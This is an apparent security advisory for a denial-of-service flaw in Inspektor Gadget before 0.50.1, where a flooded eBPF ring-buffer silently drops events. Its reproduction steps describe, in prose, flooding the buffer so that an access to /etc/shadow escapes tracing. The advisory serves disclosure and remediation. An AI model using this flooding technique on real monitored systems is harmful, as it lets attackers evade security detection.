Inspektor Gadget Denial-of-Service Vulnerability via Event Dropping

A denial-of-service vulnerability has been identified in Inspektor Gadget versions prior to 0.50.1. This issue arises in situations where a gadget's ring-buffer is already full, either accidentally or intentionally, causing the gadget to silently drop events. The vulnerability can be exploited by a malicious event source, such as a compromised container, to disrupt event processing from other containers or the same container. This is particularly concerning if the tracing is used for security purposes, as it can lead to evasion of detection.

Impact

Exploitation of this vulnerability causes the system to drop events from eBPF programs, which can disrupt monitoring and tracing activities. This event loss can be particularly harmful if the tracing is used for security purposes, as it allows for evasion of detection.

Reproduction

To reproduce this vulnerability, set up a Linux host and install Inspektor Gadget version 0.48.0. Run the command 'ig run trace_open -c poc-flood-evasion' while piping the output to grep for 'shadow'. In another terminal, execute a script that compiles and runs a program designed to flood the ring-buffer with events. The first access to '/etc/shadow' will be tracked, but the second access, performed while the buffer is flooded, will be silently dropped.

Remediation

Users can upgrade to Inspektor Gadget version 0.50.1 or later to address this vulnerability.